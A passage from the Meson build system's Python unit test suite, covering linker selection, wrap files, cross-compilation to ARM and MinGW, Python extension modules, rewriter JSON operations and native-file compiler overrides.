if lang != 'rust' and comp.use_linker_args('foo') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'GNU ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'GNU ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'lld')
@skipIfNoExecutable('rustc')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'GNU ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'GNU ld.gold')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'GNU ld.gold')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'GNU ld.gold')
@skipIfNoExecutable('gfortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'GNU ld.gold')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
if os.path.exists('/etc/debian_version'):
rc = subprocess.call(['pkg-config', '--cflags', 'python2'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc != 0:
# Python 2 will be removed in Debian Bullseye, thus we must
# remove the build dependency on python2-dev. Keep the tests
# but only run them if dev packages are available.
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', 'python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
